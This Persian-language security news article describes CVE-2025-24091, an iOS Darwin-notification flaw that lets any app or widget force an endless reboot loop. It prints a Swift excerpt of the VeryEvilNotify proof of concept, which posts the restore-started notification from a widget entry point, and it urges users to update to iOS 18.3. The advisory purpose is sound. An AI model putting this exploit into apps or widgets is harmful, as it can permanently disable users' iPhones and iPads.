آسیبپذیری بحرانی جدیدی در سیستمعامل iOS با شناسه CVE-2025-24091 شناسایی شده که به اپلیکیشنهای مخرب امکان میدهد با اجرای یک خط کد، دستگاههای آیفون و آیپد را بهطور دائم از کار بیندازند.
این نقص از سیستم اعلانهای Darwin در لایه CoreOS سوءاستفاده کرده و با ایجاد چرخه بیپایان ریبوت، دستگاه را به حالت غیرقابلاستفاده (بریک) درمیآورد، بهگونهای که تنها راهحل، بازگردانی کامل سیستم است.
این اولین آسیبپذیری مرتبط با سیستم Darwin در محصولات اپل نیست. پیشتر، شرکت Kaspersky یک آسیبپذیری با نام «Darwin Nuke» شناسایی کرده بود که به مهاجمان راهدور امکان میداد با ارسال بستههای شبکهای دستکاریشده، حملات انکار سرویس (DoS) را آغاز کنند.
اعلانهای Darwin چی هستند؟
سیستم اعلانهای Darwin، مکانیزمی سطح پایین در CoreOS، برای تبادل پیام بین پردازشها در سیستمعاملهای اپل طراحی شده است. برخلاف ابزارهای شناختهشدهتر مانند NSNotificationCenter، این سیستم بخشی از APIهای قدیمی بوده و در اعماق سیستمعامل عمل میکند.
هر اپلیکیشن سندباکسشده یا ویجت در iOS، بدون نیاز به مجوزهای خاص، قادر به ارسال این اعلانهاست. این اعلانها میتوانند توابع سیستمی قدرتمندی، مانند فعالسازی حالت Restore in Progress، را راهاندازی کنند.
مشخصات و نحوه اکسپلویت CVE-2025-24091
این آسیبپذیری با اجرای یک خط کد ساده، دستگاه را به حالت Restore in Progress میبرد. چون هیچ فرآیند ریاستور واقعی در جریان نیست، عملیات با شکست مواجه میشود و دستگاه ریبوت میشود.

یک محقق امنیتی اثبات مفهومی (PoC) با نام VeryEvilNotify توسعه داده که این کد را در یک افزونه ویجت پیادهسازی میکند. از آنجا که افزونههای ویجت بهصورت دورهای توسط iOS در پسزمینه فعال میشوند، این اکسپلویت پس از هر ریبوت مجددا اجرا شده و چرخهای مداوم از اختلال ایجاد میکند. به رامبو، محقق امنیتی مذکور، برای کشف این آسیبپذیری، مبلغ ۱۷,۵۰۰ دلار بهعنوان پاداش باگ بانتی اعطا شد.
بخشی از کد ویجت VeryEvilNotify:
import WidgetKit
import SwiftUI
import notify
struct VeryEvilWidgetBundle: WidgetBundle {
var body: some Widget {
VeryEvilWidget()
if #available(iOS 18, *) {
VeryEvilWidgetControl()
}
}
}
/// Override extension entry point to ensure the exploit code is always run whenever
/// our extension gets woken up by the system.
@main
struct VeryEvilWidgetEntryPoint {
static func main() {
notify_post("com.apple.MobileSync.BackupAgent.RestoreStarted")
VeryEvilWidgetBundle.main()
}
}
مشخصات آسیبپذیری:
- محصولات آسیبپذیر: دستگاههای آیفون و آیپد با نسخههای iOS/iPadOS پیش از ۱۸.۳
- اثر حمله: انکار سرویس (DoS)
- پیشنیازها: اپلیکیشن سندباکسشده یا ویجت بدون نیاز به مجوز خاص
- امتیاز CVSS 3.1: بالا
شرکت اپل این نقص را در نسخه iOS 18.3 با معرفی مجوزهای جدید برای اعلانهای حساس Darwin برطرف کرده است. اعلانهای سیستمی اکنون باید با پیشوند com.apple.private.restrict-post. آغاز شوند و پردازشهای ارسالکننده نیازمند مجوزهای محدودشدهای مانند com.apple.private.darwin-notification.restrict-post. هستند.
توصیه امنیتی
به تمامی کاربران آیفون توصیه اکید میشود که هرچه سریعتر به نسخه iOS 18.3 یا بالاتر بهروزرسانی کنند. دستگاههایی که از نسخههای قدیمیتر استفاده میکنند، همچنان در برابر این حمله آسیبپذیر هستند. این حمله ممکن است از طریق اپلیکیشنها یا ویجتهایی که بیخطر به نظر میرسند، چه در App Store و چه از منابع دیگر، اجرا شود.
این مورد بار دیگر چالشهای همیشگی امنیت در سیستمعاملهای موبایل را برجسته میکند؛ جایی که حتی APIهای قدیمی و سادهای که مورد توجه قرار نگرفتهاند، در صورت ایمنسازی نادرست، میتوانند به تهدیدی جدی تبدیل شوند.